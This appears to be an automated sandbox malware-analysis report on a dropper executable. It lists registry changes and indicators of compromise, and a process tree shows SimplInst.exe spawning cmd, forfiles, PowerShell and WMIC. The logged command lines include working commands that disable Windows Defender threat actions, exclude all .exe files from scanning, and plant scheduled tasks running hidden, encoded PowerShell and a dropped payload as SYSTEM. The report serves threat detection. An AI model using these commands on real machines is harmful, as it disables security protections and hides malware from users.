Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\FLAGS	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\Version = "1.0"	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\Version = "1.0"	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ProgID = "Toolbar.ExtensionHelperObject.1"	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\HELPDIR	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\TypeLib = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}"	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0\win32	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}\	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ThreadingModel = "Apartment"	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Programmable\	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ = "_YtazTUhZpmGFMeosxGoStrqXzW"	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ = "{601F87D8-13CD-4AEA-83DA-960D9654B38D}"	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\FLAGS\ = "0"	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0\win32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\joihglJ.exe"	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\WSPNEpLqQIE"	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ = "IyFOGQOPsSrjKINQhDMF"	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\HELPDIR	bJTzvxo.exe

Suspicious behavior: EnumeratesProcesses 50 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exebJTzvxo.exepowershell.exepowershell.exepowershell.exe

pid	process
1480	powershell.exe
1480	powershell.exe
1416	powershell.exe
1416	powershell.exe
1992	powershell.exe
1992	powershell.exe
1644	powershell.EXE
1332	powershell.exe
1332	powershell.exe
904	powershell.exe
904	powershell.exe
1952	powershell.exe
1952	powershell.exe
2004	powershell.EXE
1336	powershell.exe
1336	powershell.exe
1476	powershell.exe
1476	powershell.exe
1508	powershell.exe
1508	powershell.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1088	powershell.exe
1088	powershell.exe
1616	powershell.exe
1616	powershell.exe
1924	powershell.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1400	bJTzvxo.exe
1924	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exepowershell.exeWMIC.exepowershell.exepowershell.EXEWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1480	powershell.exe
Token: SeIncreaseQuotaPrivilege	808	WMIC.exe
Token: SeSecurityPrivilege	808	WMIC.exe
Token: SeTakeOwnershipPrivilege	808	WMIC.exe
Token: SeLoadDriverPrivilege	808	WMIC.exe
Token: SeSystemProfilePrivilege	808	WMIC.exe
Token: SeSystemtimePrivilege	808	WMIC.exe
Token: SeProfSingleProcessPrivilege	808	WMIC.exe
Token: SeIncBasePriorityPrivilege	808	WMIC.exe
Token: SeCreatePagefilePrivilege	808	WMIC.exe
Token: SeBackupPrivilege	808	WMIC.exe
Token: SeRestorePrivilege	808	WMIC.exe
Token: SeShutdownPrivilege	808	WMIC.exe
Token: SeDebugPrivilege	808	WMIC.exe
Token: SeSystemEnvironmentPrivilege	808	WMIC.exe
Token: SeRemoteShutdownPrivilege	808	WMIC.exe
Token: SeUndockPrivilege	808	WMIC.exe
Token: SeManageVolumePrivilege	808	WMIC.exe
Token: 33	808	WMIC.exe
Token: 34	808	WMIC.exe
Token: 35	808	WMIC.exe
Token: SeDebugPrivilege	1416	powershell.exe
Token: SeIncreaseQuotaPrivilege	936	WMIC.exe
Token: SeSecurityPrivilege	936	WMIC.exe
Token: SeTakeOwnershipPrivilege	936	WMIC.exe
Token: SeLoadDriverPrivilege	936	WMIC.exe
Token: SeSystemProfilePrivilege	936	WMIC.exe
Token: SeSystemtimePrivilege	936	WMIC.exe
Token: SeProfSingleProcessPrivilege	936	WMIC.exe
Token: SeIncBasePriorityPrivilege	936	WMIC.exe
Token: SeCreatePagefilePrivilege	936	WMIC.exe
Token: SeBackupPrivilege	936	WMIC.exe
Token: SeRestorePrivilege	936	WMIC.exe
Token: SeShutdownPrivilege	936	WMIC.exe
Token: SeDebugPrivilege	936	WMIC.exe
Token: SeSystemEnvironmentPrivilege	936	WMIC.exe
Token: SeRemoteShutdownPrivilege	936	WMIC.exe
Token: SeUndockPrivilege	936	WMIC.exe
Token: SeManageVolumePrivilege	936	WMIC.exe
Token: 33	936	WMIC.exe
Token: 34	936	WMIC.exe
Token: 35	936	WMIC.exe
Token: SeDebugPrivilege	1992	powershell.exe
Token: SeDebugPrivilege	1644	powershell.EXE
Token: SeIncreaseQuotaPrivilege	1360	WMIC.exe
Token: SeSecurityPrivilege	1360	WMIC.exe
Token: SeTakeOwnershipPrivilege	1360	WMIC.exe
Token: SeLoadDriverPrivilege	1360	WMIC.exe
Token: SeSystemProfilePrivilege	1360	WMIC.exe
Token: SeSystemtimePrivilege	1360	WMIC.exe
Token: SeProfSingleProcessPrivilege	1360	WMIC.exe
Token: SeIncBasePriorityPrivilege	1360	WMIC.exe
Token: SeCreatePagefilePrivilege	1360	WMIC.exe
Token: SeBackupPrivilege	1360	WMIC.exe
Token: SeRestorePrivilege	1360	WMIC.exe
Token: SeShutdownPrivilege	1360	WMIC.exe
Token: SeDebugPrivilege	1360	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1360	WMIC.exe
Token: SeRemoteShutdownPrivilege	1360	WMIC.exe
Token: SeUndockPrivilege	1360	WMIC.exe
Token: SeManageVolumePrivilege	1360	WMIC.exe
Token: 33	1360	WMIC.exe
Token: 34	1360	WMIC.exe
Token: 35	1360	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

044dddee4308c73a3d6d7cb710f209d4.exeSimplInst.exeSimplInst.execmd.exeforfiles.execmd.exepowershell.exeforfiles.execmd.exe

description	pid	process	target process
PID 1656 wrote to memory of 1208	1656	044dddee4308c73a3d6d7cb710f209d4.exe	SimplInst.exe
PID 1656 wrote to memory of 1208	1656	044dddee4308c73a3d6d7cb710f209d4.exe	SimplInst.exe
PID 1656 wrote to memory of 1208	1656	044dddee4308c73a3d6d7cb710f209d4.exe	SimplInst.exe
PID 1656 wrote to memory of 1208	1656	044dddee4308c73a3d6d7cb710f209d4.exe	SimplInst.exe
PID 1656 wrote to memory of 1208	1656	044dddee4308c73a3d6d7cb710f209d4.exe	SimplInst.exe
PID 1656 wrote to memory of 1208	1656	044dddee4308c73a3d6d7cb710f209d4.exe	SimplInst.exe
PID 1656 wrote to memory of 1208	1656	044dddee4308c73a3d6d7cb710f209d4.exe	SimplInst.exe
PID 1208 wrote to memory of 1280	1208	SimplInst.exe	SimplInst.exe
PID 1208 wrote to memory of 1280	1208	SimplInst.exe	SimplInst.exe
PID 1208 wrote to memory of 1280	1208	SimplInst.exe	SimplInst.exe
PID 1208 wrote to memory of 1280	1208	SimplInst.exe	SimplInst.exe
PID 1208 wrote to memory of 1280	1208	SimplInst.exe	SimplInst.exe
PID 1208 wrote to memory of 1280	1208	SimplInst.exe	SimplInst.exe
PID 1208 wrote to memory of 1280	1208	SimplInst.exe	SimplInst.exe
PID 1280 wrote to memory of 1704	1280	SimplInst.exe	cmd.exe
PID 1280 wrote to memory of 1704	1280	SimplInst.exe	cmd.exe
PID 1280 wrote to memory of 1704	1280	SimplInst.exe	cmd.exe
PID 1280 wrote to memory of 1704	1280	SimplInst.exe	cmd.exe
PID 1280 wrote to memory of 1704	1280	SimplInst.exe	cmd.exe
PID 1280 wrote to memory of 1704	1280	SimplInst.exe	cmd.exe
PID 1280 wrote to memory of 1704	1280	SimplInst.exe	cmd.exe
PID 1704 wrote to memory of 1168	1704	cmd.exe	forfiles.exe
PID 1704 wrote to memory of 1168	1704	cmd.exe	forfiles.exe
PID 1704 wrote to memory of 1168	1704	cmd.exe	forfiles.exe
PID 1704 wrote to memory of 1168	1704	cmd.exe	forfiles.exe
PID 1704 wrote to memory of 1168	1704	cmd.exe	forfiles.exe
PID 1704 wrote to memory of 1168	1704	cmd.exe	forfiles.exe
PID 1704 wrote to memory of 1168	1704	cmd.exe	forfiles.exe
PID 1168 wrote to memory of 904	1168	forfiles.exe	cmd.exe
PID 1168 wrote to memory of 904	1168	forfiles.exe	cmd.exe
PID 1168 wrote to memory of 904	1168	forfiles.exe	cmd.exe
PID 1168 wrote to memory of 904	1168	forfiles.exe	cmd.exe
PID 1168 wrote to memory of 904	1168	forfiles.exe	cmd.exe
PID 1168 wrote to memory of 904	1168	forfiles.exe	cmd.exe
PID 1168 wrote to memory of 904	1168	forfiles.exe	cmd.exe
PID 904 wrote to memory of 1480	904	cmd.exe	powershell.exe
PID 904 wrote to memory of 1480	904	cmd.exe	powershell.exe
PID 904 wrote to memory of 1480	904	cmd.exe	powershell.exe
PID 904 wrote to memory of 1480	904	cmd.exe	powershell.exe
PID 904 wrote to memory of 1480	904	cmd.exe	powershell.exe
PID 904 wrote to memory of 1480	904	cmd.exe	powershell.exe
PID 904 wrote to memory of 1480	904	cmd.exe	powershell.exe
PID 1480 wrote to memory of 808	1480	powershell.exe	WMIC.exe
PID 1480 wrote to memory of 808	1480	powershell.exe	WMIC.exe
PID 1480 wrote to memory of 808	1480	powershell.exe	WMIC.exe
PID 1480 wrote to memory of 808	1480	powershell.exe	WMIC.exe
PID 1480 wrote to memory of 808	1480	powershell.exe	WMIC.exe
PID 1480 wrote to memory of 808	1480	powershell.exe	WMIC.exe
PID 1480 wrote to memory of 808	1480	powershell.exe	WMIC.exe
PID 1280 wrote to memory of 864	1280	SimplInst.exe	forfiles.exe
PID 1280 wrote to memory of 864	1280	SimplInst.exe	forfiles.exe
PID 1280 wrote to memory of 864	1280	SimplInst.exe	forfiles.exe
PID 1280 wrote to memory of 864	1280	SimplInst.exe	forfiles.exe
PID 1280 wrote to memory of 864	1280	SimplInst.exe	forfiles.exe
PID 1280 wrote to memory of 864	1280	SimplInst.exe	forfiles.exe
PID 1280 wrote to memory of 864	1280	SimplInst.exe	forfiles.exe
PID 864 wrote to memory of 812	864	forfiles.exe	cmd.exe
PID 864 wrote to memory of 812	864	forfiles.exe	cmd.exe
PID 864 wrote to memory of 812	864	forfiles.exe	cmd.exe
PID 864 wrote to memory of 812	864	forfiles.exe	cmd.exe
PID 864 wrote to memory of 812	864	forfiles.exe	cmd.exe
PID 864 wrote to memory of 812	864	forfiles.exe	cmd.exe
PID 864 wrote to memory of 812	864	forfiles.exe	cmd.exe
PID 812 wrote to memory of 964	812	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\044dddee4308c73a3d6d7cb710f209d4.exe
"C:\Users\Admin\AppData\Local\Temp\044dddee4308c73a3d6d7cb710f209d4.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1656

C:\Users\Admin\AppData\Local\Temp\7zS8D71.tmp\SimplInst.exe
.\SimplInst.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1208

C:\Users\Admin\AppData\Local\Temp\7zS8F54.tmp\SimplInst.exe
.\SimplInst.exe /S /site_id=767
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1280

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
4⤵
- Suspicious use of WriteProcessMemory
PID:1704

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:1168

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:904

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1480

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:808

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
PID:292

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1416

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:936

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
PID:1596

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:1696

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1360

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:864

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:812

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:964

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:1920

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gIFIrZJZY" /SC once /ST 01:35:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:1996

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gIFIrZJZY"
4⤵
PID:288

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gIFIrZJZY"
4⤵
PID:1628

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bqZkKdgiyjBiVwZYfn" /SC once /ST 07:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\WlwqqkB.exe\" nv /site_id 767 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1996

C:\Windows\system32\taskeng.exe
taskeng.exe {F2E8AB08-A91E-4FE2-ACF9-88642DB2E97F} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
1⤵
PID:1832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1644

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2004

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1692

C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\iIHWIbnD\wZJPSyw.exe
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\iIHWIbnD\wZJPSyw.exe en /S
2⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
PID:1644

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
3⤵
PID:1528

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:924

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:848

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1088

